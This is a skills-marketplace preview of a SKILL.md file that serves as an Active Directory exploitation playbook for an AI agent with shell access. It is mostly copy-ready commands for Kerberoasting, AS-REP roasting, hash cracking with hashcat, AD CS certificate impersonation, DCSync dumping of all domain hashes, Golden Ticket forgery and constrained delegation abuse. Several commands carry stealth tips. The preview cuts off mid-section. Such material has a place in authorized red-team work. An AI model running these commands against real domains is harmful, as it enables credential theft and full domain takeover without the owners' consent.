Skip to main content

ad

Active Directory exploitation — BloodHound analysis, Kerberoasting, AS-REP Roasting, AD CS abuse, DCSync, Golden Ticket, Constrained Delegation.

跳到安装

来源信息

仓库
BitterSecurity/Decepticon
最近来源活动
2026年5月26日 15:19
检测到的 SKILL.md 语言
英语
星标
5,565
分支
1,053

安装方式

默认使用会先检查来源的 Prompt;你也可以切换为直接命令,或下载本地副本。

检查来源文件

决定是否安装前,请先阅读 SKILL.md,以及 SkillsMP 当前展示的配套文件。

文件资源管理器
2 个文件

正在显示 SKILL.md

SKILL.md
来源说明 · 只读预览
name
ad
description
Active Directory exploitation — BloodHound analysis, Kerberoasting, AS-REP Roasting, AD CS abuse, DCSync, Golden Ticket, Constrained Delegation.
allowed-tools
Bash Read Write
metadata
{"subdomain":"credential-access","when_to_use":"kerberoast, AS-REP roast, DCSync, golden ticket, AD CS, bloodhound, constrained delegation, active directory exploit, certipy, rubeus","tags":"active-directory, kerberos, credential-access, privilege-escalation, lateral-movement","mitre_attack":"T1558.003, T1558.004, T1003.006, T1649, T1550.003, T1087.002"}
# Active Directory Exploitation Knowledge Base Active Directory exploitation targets authentication protocols, certificate services, and trust relationships to escalate privileges, extract credentials, and achieve domain dominance. All techniques require prior domain access (compromised user or machine account). ## Quick Reference — Common AD Attack Patterns ```bash # BloodHound collection (SharpHound from Windows) SharpHound.exe -c All --outputdirectory bloodhound/ # BloodHound collection (bloodhound-python from Linux) bloodhound-python -u '<USER>' -p '<PASS>' -d <TARGET> -ns <DC_IP> -c all --zip -o bloodhound/ # Kerberoast all SPNs impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt # AS-REP Roast impacket-GetNPUsers '<DOMAIN>/' -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt # DCSync — dump all hashes impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<DC_IP> -outputfile dcsync_dump # AD CS enumeration certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -stdout > adcs_enum.txt ``` ## MITRE ATT&CK Mapping | Technique ID | Name | Skill Section | |-------------|------|---------------| | T1558.003 | Kerberoasting | Section 2 | | T1558.004 | AS-REP Roasting | Section 3 | | T1003.006 | DCSync | Section 5 | | T1649 | Steal or Forge Authentication Certificates | Section 4 | | T1550.003 | Pass the Ticket | Section 6, 7 | | T1087.002 | Domain Account Discovery | Section 1 | ## 1. BloodHound / SharpHound — Attack Path Analysis ### Data Collection **SharpHound (Windows)** ```powershell # All collection methods — generates ZIP for BloodHound import SharpHound.exe -c All --outputdirectory C:\workspace\bloodhound\ # Stealth collection — sessions only (lower noise) SharpHound.exe -c Session --loop --loopduration 02:00:00 # Specific collection types SharpHound.exe -c DCOnly # DC queries only — no host enumeration SharpHound.exe -c Group,ACL,Trust # Targeted collection ``` **bloodhound-python (Linux)** ```bash # Full collection from Linux bloodhound-python -u '<USER>' -p '<PASS>' -d <TARGET> -ns <DC_IP> -c all --zip -o bloodhound/ # With NTLM hash (pass-the-hash) bloodhound-python -u '<USER>' --hashes ':<NT_HASH>' -d <TARGET> -ns <DC_IP> -c all --zip -o bloodhound/ ``` ### Key BloodHound Queries ```cypher # Find shortest path to Domain Admins MATCH p=shortestPath((n {owned:true})-[*1..]->(g:Group {name:"DOMAIN ADMINS@<TARGET>"})) RETURN p # Find Kerberoastable users with admin paths MATCH (u:User {hasspn:true})-[*1..5]->(g:Group {highvalue:true}) RETURN u.name, g.name # Find AS-REP Roastable users MATCH (u:User {dontreqpreauth:true}) RETURN u.name, u.description # Find users with DCSync rights MATCH p=(n)-[:GetChanges|GetChangesAll*1..]->(d:Domain) RETURN p # Find constrained delegation targets MATCH (c {allowedtodelegate: true}) RETURN c.name, c.allowedtodelegate ``` ## 2. Kerberoasting Targets service accounts with SPNs. Requests TGS tickets encrypted with the service account's password hash, then cracks offline. ### Enumeration & Extraction **Impacket (Linux)** ```bash # Request all kerberoastable TGS tickets impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt # With NTLM hash impacket-GetUserSPNs '<DOMAIN>/<USER>' -hashes ':<NT_HASH>' -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt # Target a specific SPN impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request-user '<SPN_USER>' -outputfile kerberoast_target.txt ``` **Rubeus (Windows)** ```powershell # Kerberoast all SPNs Rubeus.exe kerberoast /outfile:C:\workspace\kerberoast_hashes.txt # Target specific user Rubeus.exe kerberoast /user:<SPN_USER> /outfile:C:\workspace\kerberoast_target.txt # Use RC4 downgrade for easier cracking (noisier) Rubeus.exe kerberoast /rc4opsec /outfile:C:\workspace\kerberoast_rc4.txt # Use AES (stealthier, harder to crack) Rubeus.exe kerberoast /aes /outfile:C:\workspace\kerberoast_aes.txt ``` ### Offline Cracking ```bash # Hashcat — Kerberos 5 TGS-REP (mode 13100) hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -o kerberoast_cracked.txt # With multiple wordlists hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt /usr/share/wordlists/custom.txt -o kerberoast_cracked.txt # AES-encrypted TGS tickets (mode 19700) hashcat -m 19700 kerberoast_aes_hashes.txt /usr/share/wordlists/rockyou.txt -o kerberoast_aes_cracked.txt ``` ## 3. AS-REP Roasting Targets accounts with "Do not require Kerberos pre-authentication" enabled. No valid credentials required — only a username list. ### Enumeration & Extraction **Impacket (Linux)** ```bash # With a user list (no creds needed) impacket-GetNPUsers '<DOMAIN>/' -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt # With valid creds — enumerate and roast automatically impacket-GetNPUsers '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -request -format hashcat -outputfile asrep_hashes.txt ``` **Rubeus (Windows)** ```powershell # AS-REP Roast all vulnerable accounts Rubeus.exe asreproast /format:hashcat /outfile:C:\workspace\asrep_hashes.txt # Target specific user Rubeus.exe asreproast /user:<TARGET_USER> /format:hashcat /outfile:C:\workspace\asrep_target.txt ``` ### Offline Cracking ```bash # Hashcat — Kerberos 5 AS-REP (mode 18200) hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -o asrep_cracked.txt ``` ## 4. AD CS Abuse — ESC1 (Certificate Template Exploitation) ESC1: Certificate template allows requesters to specify a Subject Alternative Name (SAN), enabling impersonation of any domain user including Domain Admins. ### Prerequisites - Enrollment rights on a vulnerable template - Template allows client authentication (EKU) - Template permits SAN specification (ENROLLEE_SUPPLIES_SUBJECT) ### Enumeration **Certipy (Linux)** ```bash # Enumerate all CA and template information certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -stdout > adcs_enum.txt # Find vulnerable templates specifically certipy find -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -vulnerable -stdout > adcs_vulnerable.txt ``` **Certify (Windows)** ```powershell # Enumerate CAs and templates Certify.exe cas Certify.exe find # Find vulnerable templates Certify.exe find /vulnerable ``` ### ESC1 Exploitation **Certipy (Linux)** ```bash # Request certificate with SAN of Domain Admin certipy req -u '<USER>@<DOMAIN>' -p '<PASS>' -dc-ip <DC_IP> -ca '<CA_NAME>' -template '<TEMPLATE_NAME>' -upn 'administrator@<DOMAIN>' -out admin_cert # Authenticate with the certificate (PKINIT) certipy auth -pfx admin_cert.pfx -dc-ip <DC_IP> -domain <TARGET> # Output: NT hash of the impersonated user — use for pass-the-hash ``` **Certify + Rubeus (Windows)** ```powershell # Request certificate with SAN Certify.exe request /ca:<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator # Convert PEM to PFX openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx # Authenticate with certificate via Rubeus (PKINIT) Rubeus.exe asktgt /user:administrator /certificate:C:\workspace\admin.pfx /ptt ``` ## 5. DCSync Attack Impersonates a Domain Controller to request password replication data. Requires DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights (typically Domain Admins, Enterprise Admins, or DC machine accounts). ### Check Replication Rights ```bash # BloodHound query MATCH p=(n)-[:GetChanges|GetChangesAll*1..]->(d:Domain) RETURN p # Impacket — check ACLs impacket-findDelegation '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> ``` ### Execution **Impacket secretsdump.py (Linux)** ```bash # DCSync all accounts impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<DC_IP> -outputfile dcsync_dump # DCSync specific user (stealthier) impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<DC_IP> -just-dc-user administrator -outputfile dcsync_admin # With pass-the-hash impacket-secretsdump '<DOMAIN>/<USER>'@<DC_IP> -hashes ':<NT_HASH>' -just-dc -outputfile dcsync_dump ``` **Mimikatz (Windows)** ```powershell # DCSync all accounts mimikatz # lsadump::dcsync /domain:<TARGET> /all /csv # DCSync specific user mimikatz # lsadump::dcsync /domain:<TARGET> /user:administrator # DCSync krbtgt (for Golden Ticket creation) mimikatz # lsadump::dcsync /domain:<TARGET> /user:krbtgt ``` ### Output Format ``` # secretsdump output format: <DOMAIN>\<USER>:<RID>:<LM_HASH>:<NT_HASH>::: # Key accounts to extract: # - Administrator (RID 500) — domain admin access # - krbtgt — Golden Ticket creation # - Machine accounts — lateral movement via S4U ``` ## 6. Golden Ticket Creation Forges a TGT using the krbtgt account hash, granting unlimited access as any user for the lifetime of the ticket (default 10 years). Requires the krbtgt NTLM hash (obtained via DCSync). ### Prerequisites - krbtgt NTLM hash - Domain SID (`whoami /user` or `impacket-lookupsid`) - Domain FQDN ### Forge the Ticket **Mimikatz (Windows)** ```powershell # Create Golden Ticket and inject into memory mimikatz # kerberos::golden /user:administrator /domain:<TARGET> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NT_HASH> /ptt # Create Golden Ticket and save to file mimikatz # kerberos::golden /user:administrator /domain:<TARGET> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NT_HASH> /ticket:C:\workspace\golden.kirbi # With specific groups (Domain Admins=512, Enterprise Admins=519, Schema Admins=518) mimikatz # kerberos::golden /user:administrator /domain:<TARGET> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NT_HASH> /groups:512,519,518 /ptt ``` **Impacket ticketer.py (Linux)** ```bash # Create Golden Ticket impacket-ticketer -nthash '<KRBTGT_NT_HASH>' -domain-sid '<DOMAIN_SID>' -domain '<TARGET>' administrator -outputfile golden # Use the ticket export KRB5CCNAME=golden.ccache impacket-psexec '<TARGET>/administrator@<DC_HOSTNAME>' -k -no-pass impacket-secretsdump '<TARGET>/administrator@<DC_HOSTNAME>' -k -no-pass impacket-wmiexec '<TARGET>/administrator@<DC_HOSTNAME>' -k -no-pass ``` ### Lookup Domain SID ```bash # From Linux impacket-lookupsid '<DOMAIN>/<USER>:<PASS>'@<DC_IP> 0 # From Windows whoami /user # Remove the last RID portion (-500, -1001, etc.) to get the domain SID ``` ## 7. Constrained Delegation Abuse Abuses S4U2self and S4U2proxy Kerberos extensions. A compromised account with constrained delegation can impersonate any user to the delegated service. ### Enumeration ```bash # Find accounts with constrained delegation (Impacket) impacket-findDelegation '<DOMAIN>/<USER>:<PASS>' -dc-ip <DC_IP> -target-domain <TARGET> # BloodHound query MATCH (c {allowedtodelegate: true}) RETURN c.name, c.allowedtodelegate ``` ```powershell # PowerShell Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo ``` ### S4U2self / S4U2proxy Exploitation **Impacket getST.py (Linux)** ```bash # Request service ticket via S4U — impersonate administrator to target service impacket-getST '<DOMAIN>/<COMPROMISED_ACCOUNT>:<PASS>' -spn '<TARGET_SPN>' -impersonate administrator -dc-ip <DC_IP> -outputfile s4u_ticket # With NTLM hash impacket-getST '<DOMAIN>/<COMPROMISED_ACCOUNT>' -hashes ':<NT_HASH>' -spn '<TARGET_SPN>' -impersonate administrator -dc-ip <DC_IP> -outputfile s4u_ticket # Use the resulting ticket export KRB5CCNAME=s4u_ticket.ccache impacket-psexec '<TARGET>/administrator@<TARGET_HOST>' -k -no-pass impacket-smbexec '<TARGET>/administrator@<TARGET_HOST>' -k -no-pass ``` **Rubeus (Windows)** ```powershell # S4U full chain — request TGT, then S4U2self, then S4U2proxy
在 GitHub 查看
这个 SKILL.md 很大,SkillsMP 这里只预览前一段内容。 在 GitHub 查看